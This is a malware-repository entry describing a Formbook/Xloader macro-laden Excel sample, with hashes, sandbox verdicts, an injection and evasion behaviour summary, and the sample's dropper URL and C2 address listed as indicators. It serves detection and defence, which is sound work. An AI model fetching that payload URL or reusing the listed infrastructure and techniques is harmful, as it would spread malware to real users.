MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 67c2d1838c17151b34861887e15359c92dad555ce861d809b2f7cd9688e4455c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Formbook


Vendor detections: 9


Maldoc score: 11


Intelligence 9 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 67c2d1838c17151b34861887e15359c92dad555ce861d809b2f7cd9688e4455c
SHA3-384 hash: fd6651f6f866e7cf9bc41840fcdcdff3fa128c9372de19a67738fe13133321bd7bdd50c9cd2f2cc6f3b0c05b95600b7c
SHA1 hash: 5f1a4160d8c1a5aad5e9ed1f0eac0eecaa1f7a99
MD5 hash: bbb27746203855d42f677ce130686e7c
humanhash: illinois-avocado-speaker-johnny
File name:2021catalog-selected products.xlsm
Download: download sample
Signature Formbook
Create hunting rule
File size:10'006 bytes
First seen:2021-10-09 06:29:24 UTC
Last seen:Never
File type:Excel file xlsm
MIME type:application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
ssdeep 192:s65vv5mn572/pIXFONh4Bb3dZxEZgt5OxLJlsbATBaFqJ+J1M:suvv5m8/6FY4tZxEZgvODla+Mu
TLSH T160228E1FDAC6C87DCACB98BB029B2A779C0C6542A5C8B5423EA412797151D8403FF5AF
Reporter abuse_ch
Tags:FormBook xlsm


Avatar
abuse_ch
Formbook payload URL:
http://13.92.100.208/toks/audio.exe

Office OLE Information

This malware samples appears to be an Office document. The following table provides more information about this document using oletools and oledump.

OLE id
Maldoc score: 11
OLE dump

MalwareBazaar was able to identify 8 sections in this file using oledump:

Section IDSection sizeSection name
A1535 bytesPROJECT
A292 bytesPROJECTwm
A3169 bytesVBA/Table 1
A41059 bytesVBA/ThisWorkbook
A5171 bytesVBA/Workbook
A67 bytesVBA/_VBA_PROJECT
A7234 bytesVBA/dir
OLE vba

MalwareBazaar was able to extract and deobfuscate VBA script(s) the following information from OLE objects embedded in this file using olevba:

TypeKeywordDescription
AutoExecWorkbook_ActivateRuns when the Excel Workbook is opened
IOCershell.exeExecutable file name
IOCBrznatqyjaodlncwtvecExecutable file name
SuspiciousOpenMay open a file
SuspiciousOutputMay write to a file (if combined with Open)
SuspiciousShellMay run an executable file or a system command
SuspiciousHex StringsHex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)
SuspiciousBase64 StringsBase64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)

Intelligence

File Origin
# of uploads :
1
# of downloads :
349
Origin country :
n/a
Vendor Threat Intelligence
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/196267/
Result
Verdict:
Malicious
File Type:
Excel File with Macro
Link:
https://app.docguard.net/67c2d1838c17151b34861887e15359c92dad555ce861d809b2f7cd9688e4455c/results/dashboard
Verdict:
Malicious
Threat level:
  10/10
Confidence:
60%
Tags:
cmd macros macros-on-open
Link:
https://www.filescan.io/uploads/616136f5ddf069d1b6a4edc3/reports/f458a214-768f-49b1-b96c-2d5508675c07/overview
Result
Verdict:
MALICIOUS
Link:
https://labs.inquest.net/dfi/sha256/67c2d1838c17151b34861887e15359c92dad555ce861d809b2f7cd9688e4455c
Details
Base64 Encoded Powershell Directives
Detected one or more base64 encoded Powershell directives.
Macro with Startup Hook
Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.
Macro with File System Write
Detected macro logic that can write data to the file system.
IPv4 Dotted Quad URL
A URL was detected referencing a direct IP address, as opposed to a domain name.
Hidden Powershell
Detected a pivot to Powershell that utilizes commonly nefarious attributes such as '-windowstyle hidden'.
Macro Contains Suspicious String
Detected a macro with a suspicious string. Suspicious strings include privileged function calls, obfuscations, odd registry keys, etc...
Base64 Encoded URL
Detected an ANSI or UNICODE http:// or https:// base64 encoded URL prefix.
Document With Minimal Content
Document contains less than 1 kilobyte of semantic information.
Result
Threat name:
FormBook
Create hunting rule
Detection:
malicious
Classification:
bank.troj.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/867372
Signature
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Document contains an embedded VBA macro which may execute processes
Document exploit detected (creates forbidden files)
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Found malware configuration
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Encoded PowerShell Command Line
Tries to detect virtualization through RDTSC time measurements
Yara detected FormBook
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 499800 Sample: 2021catalog-selected produc... Startdate: 09/10/2021 Architecture: WINDOWS Score: 100 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 10 other signatures 2->64 12 EXCEL.EXE 31 11 2->12         started        process3 file4 40 C:\Users\user\...\Brznatqyjaodlncwtvecpod.bat, ASCII 12->40 dropped 42 C:\...\~$2021catalog-selected products.xlsm, data 12->42 dropped 44 2021catalog-select...ducts.xlsm.. (copy), data 12->44 dropped 84 Document exploit detected (creates forbidden files) 12->84 16 cmd.exe 12->16         started        signatures5 process6 signatures7 50 Malicious encrypted Powershell command line found 16->50 52 Encrypted powershell cmdline option found 16->52 19 powershell.exe 12 7 16->19         started        process8 dnsIp9 46 13.92.100.208, 49167, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->46 38 C:\Users\user\AppData\...\Ywcnejjifkinunu.exe, PE32 19->38 dropped 66 Powershell drops PE file 19->66 24 Ywcnejjifkinunu.exe 12 19->24         started        file10 signatures11 process12 dnsIp13 48 cdn.discordapp.com 162.159.129.233, 443, 49168, 49169 CLOUDFLARENETUS United States 24->48 68 Multi AV Scanner detection for dropped file 24->68 70 Machine Learning detection for dropped file 24->70 72 Tries to detect virtualization through RDTSC time measurements 24->72 74 3 other signatures 24->74 28 Ywcnejjifkinunu.exe 24->28         started        signatures14 process15 signatures16 76 Modifies the context of a thread in another process (thread injection) 28->76 78 Maps a DLL or memory area into another process 28->78 80 Sample uses process hollowing technique 28->80 82 Queues an APC in another process (thread injection) 28->82 31 explorer.exe 28->31 injected process17 process18 33 msiexec.exe 31->33         started        signatures19 54 Modifies the context of a thread in another process (thread injection) 33->54 56 Maps a DLL or memory area into another process 33->56 36 cmd.exe 33->36         started        process20
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/67c2d1838c17151b34861887e15359c92dad555ce861d809b2f7cd9688e4455c/
Threat name:
Script-Macro.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2021-10-08 18:00:21 UTC
AV detection:
8 of 28 (28.57%)
Threat level:
  2/5
Detection(s):
Malicious file
Link:
https://check.spamhaus.org/check/?searchterm=m7bnda4mc4krwnegdcd6cu2zzew22vk45bq5qcns67gzncheivoa._file
Result
Malware family:
xloader
Create hunting rule
Score:
  10/10
Tags:
family:xloader campaign:mexq loader macro rat suricata
Link:
https://tria.ge/reports/211009-g9kzdsfbcn/
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
NTFS ADS
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious behavior: RenamesItself
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Office loads VBA resources, possible macro or embedded object present
Program crash
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Deletes itself
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Xloader Payload
Process spawned unexpected child process
Xloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
Malware Config
C2 Extraction:
http://www.aliexpress-br.com/mexq/
Dropper Extraction:
http://13.92.100.208/toks/audio.exe
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/67c2d1838c17151b34861887e15359c92dad555ce861d809b2f7cd9688e4455c

File information

The table below shows additional information about this malware sample such as delivery method and external references.

  
URLhaus
https://urlhaus.abuse.ch/url/1660888/
Cape
Cape
https://www.capesandbox.com/analysis/196267/

Comments